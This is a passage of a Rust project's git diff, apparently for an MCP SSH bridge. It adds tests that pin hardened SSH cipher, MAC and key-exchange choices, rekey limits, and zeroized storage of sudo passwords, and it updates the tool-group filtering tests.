!n.contains("arcfour"), + "cipher {n} is arcfour/RC4 — excluded" + ); + assert!( + !n.contains("-cbc"), + "cipher {n} is CBC mode — excluded (CTR/GCM/ChaCha only)" + ); + } +} + +#[test] +fn pinned_preferred_excludes_legacy_macs() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + for mac in cfg.preferred.mac.iter() { + let n: &str = mac.as_ref(); + assert!(!n.contains("md5"), "mac {n} uses md5 — excluded"); + assert!(!n.contains("sha1"), "mac {n} uses sha1 — excluded"); + } +} + +#[test] +fn pinned_preferred_includes_modern_kex() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + let names: Vec<&str> = cfg.preferred.kex.iter().map(AsRef::as_ref).collect(); + assert!( + names.iter().any(|n| n == &"curve25519-sha256"), + "kex list must include curve25519-sha256, got: {names:?}" + ); +} + +#[test] +fn pinned_preferred_includes_modern_ciphers() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + let names: Vec<&str> = cfg.preferred.cipher.iter().map(AsRef::as_ref).collect(); + assert!( + names + .iter() + .any(|n| n == &"chacha20-poly1305@openssh.com" || n == &"aes256-gcm@openssh.com"), + "cipher list must include chacha20-poly1305 or aes256-gcm, got: {names:?}" + ); +} + +#[test] +fn pinned_preferred_includes_etm_macs_only() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + let names: Vec<&str> = cfg.preferred.mac.iter().map(AsRef::as_ref).collect(); + // Hardened set: only EtM (encrypt-then-MAC) variants. + for n in &names { + assert!( + n.contains("etm@openssh.com"), + "mac {n} is not encrypt-then-MAC — excluded" + ); + } + assert!( + names.iter().any(|n| n == &"hmac-sha2-512-etm@openssh.com"), + "mac list must include hmac-sha2-512-etm@openssh.com, got: {names:?}" + ); +} + +#[test] +fn rekey_limits_set_to_one_gigabyte_one_hour() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + let limits = &cfg.limits; + assert_eq!( + limits.rekey_write_limit, + 1 << 30, + "rekey_write_limit should be 1 GiB" + ); + assert_eq!( + limits.rekey_read_limit, + 1 << 30, + "rekey_read_limit should be 1 GiB" + ); + assert_eq!( + limits.rekey_time_limit, + std::time::Duration::from_secs(3600), + "rekey_time_limit should be 1 hour" + ); +} + +#[test] +fn keepalive_uses_limits_config() { + let limits = LimitsConfig { + keepalive_interval_seconds: 42, + ..LimitsConfig::default() + }; + let cfg = build_russh_client_config(&limits); + assert_eq!( + cfg.keepalive_interval, + Some(std::time::Duration::from_secs(42)) + ); + assert_eq!( + cfg.inactivity_timeout, + Some(std::time::Duration::from_secs(42)) + ); + assert_eq!(cfg.keepalive_max, 3); +} diff --git a/tests/sudo_password_zeroizing.rs b/tests/sudo_password_zeroizing.rs new file mode 100644 index 00000000..4eb0c17d --- /dev/null +++ b/tests/sudo_password_zeroizing.rs @@ -0,0 +1,67 @@ +//! FIND-028: `HostConfig.sudo_password` must be wrapped in `Zeroizing` +//! so the heap residency does not survive process lifetime / hot-reload. +//! +//! This test pins the field type at compile time. If the field reverts to +//! `Option`, the `Zeroizing::new(...)` literal stops type-checking +//! and this file fails to compile — which is exactly the regression signal +//! we want. + +use mcp_ssh_bridge::config::{AuthConfig, HostConfig, HostKeyVerification, OsType}; +use zeroize::Zeroizing; + +fn host_config_with_sudo(password: Option>) -> HostConfig { + HostConfig { + hostname: "192.0.2.10".to_string(), + port: 22, + user: "tester".to_string(), + auth: AuthConfig::Agent, + description: None, + host_key_verification: HostKeyVerification::Strict, + proxy_jump: None, + socks_proxy: None, + sudo_password: password, + tags: Vec::new(), + os_type: OsType::Linux, + shell: None, + retry: None, + protocol: mcp_ssh_bridge::config::Protocol::default(), + + #[cfg(feature = "winrm")] + winrm_use_tls: None, + #[cfg(feature = "winrm")] + winrm_accept_invalid_certs: None, + #[cfg(feature = "winrm")] + winrm_operation_timeout_secs: None, + #[cfg(feature = "winrm")] + winrm_max_envelope_size: None, + } +} + +#[test] +fn sudo_password_field_is_zeroizing() { + // Type-level assertion: this only compiles if the field is + // `Option>`. If the field type regresses to + // `Option`, the literal below fails to type-check. + let host = host_config_with_sudo(Some(Zeroizing::new("s3cret".to_string()))); + + // Borrow site stays backwards-compatible: callers can still grab a `&str` + // via Deref coercion. `Option>::as_deref` yields + // `Option<&String>` (one Deref hop); a second hop reaches `&str`. Real + // call sites pass `&Zeroizing` to functions taking `&str` and + // the compiler chains both Deref impls automatically. + let borrowed: Option<&String> = host.sudo_password.as_deref(); + assert_eq!(borrowed.map(String::as_str), Some("s3cret")); + + // Verify the raw secret bytes are reachable (defense-in-depth check + // that the wrapper does not silently mangle the value). + let raw: &str = host.sudo_password.as_ref().expect("set above"); + assert_eq!(raw, "s3cret"); +} + +#[test] +fn sudo_password_none_still_compiles() { + // The ~519 fixture sites that assign `sudo_password: None` must keep + // working — `None` is type-agnostic. + let host = host_config_with_sudo(None); + assert!(host.sudo_password.is_none()); +} diff --git a/tests/tool_filtering.rs b/tests/tool_filtering.rs index f61c38a3..3d1468b0 100644 --- a/tests/tool_filtering.rs +++ b/tests/tool_filtering.rs @@ -3,16 +3,16 @@ //! Tests that `ToolGroupsConfig` properly controls which tools are visible //! and callable through the registry. -use std::collections::HashMap; - use mcp_ssh_bridge::config::ToolGroupsConfig; -use mcp_ssh_bridge::mcp::registry::{create_filtered_registry, tool_annotations, tool_group}; +use mcp_ssh_bridge::mcp::registry::{ + all_enabled_tool_groups_config_for_test, create_filtered_registry, tool_annotations, tool_group, +}; // ============== Default Registry ============== #[test] fn test_default_registry_includes_all_groups() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -52,7 +52,7 @@ fn test_default_registry_includes_all_groups() { #[test] fn test_disable_docker_removes_all_docker_tools() { - let mut groups = HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("docker".to_string(), false); let config = ToolGroupsConfig { groups }; let registry = create_filtered_registry(&config); @@ -108,7 +108,7 @@ fn test_disable_docker_removes_all_docker_tools() { #[test] fn test_disable_kubernetes_removes_all_k8s_and_helm_tools() { - let mut groups = HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("kubernetes".to_string(), false); let config = ToolGroupsConfig { groups }; let registry = create_filtered_registry(&config); @@ -143,7 +143,7 @@ fn test_disable_kubernetes_removes_all_k8s_and_helm_tools() { #[test] fn test_disable_multiple_groups_removes_all_their_tools() { - let mut groups = HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("docker".to_string(), false); groups.insert("kubernetes".to_string(), false); groups.insert("ansible".to_string(), false); @@ -166,7 +166,7 @@ fn test_disable_multiple_groups_removes_all_their_tools() { #[test] fn test_disable_all_windows_groups() { - let mut groups = HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; for group in &[ "windows_services", "windows_events", @@ -213,7 +213,7 @@ fn test_disable_all_windows_groups() { #[test] fn test_every_tool_maps_to_a_known_group() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -310,7 +310,7 @@ fn test_every_tool_maps_to_a_known_group() { #[test] fn test_every_tool_has_non_empty_annotations() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -326,7 +326,7 @@ fn test_every_tool_has_non_empty_annotations() { #[test] fn test_read_only_tools_not_marked_destructive() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -345,7 +345,7 @@ fn test_read_only_tools_not_marked_destructive() { #[test] fn test_destructive_tools_not_marked_read_only() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -366,7 +366,7 @@ fn test_destructive_tools_not_marked_read_only() { #[test] fn test_every_tool_has_execution_task_support() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -389,7 +389,7 @@ fn test_every_tool_has_execution_task_support() { #[test] fn test_all_tools_have_valid_input_schema() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let tools = registry.list_tools(); @@ -412,7 +412,7 @@ fn test_all_tools_have_valid_input_schema() { #[tokio::test] async fn test_calling_disabled_tool_returns_unknown_tool_error() { - let mut groups = HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("docker".to_string(), false); let config = ToolGroupsConfig { groups }; let registry = create_filtered_registry(&config); @@ -427,7 +427,7 @@ async fn test_calling_disabled_tool_returns_unknown_tool_error() { #[test] fn test_enabled_tool_is_accessible() { - let config = ToolGroupsConfig::default(); + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); let handler = registry.get("ssh_exec");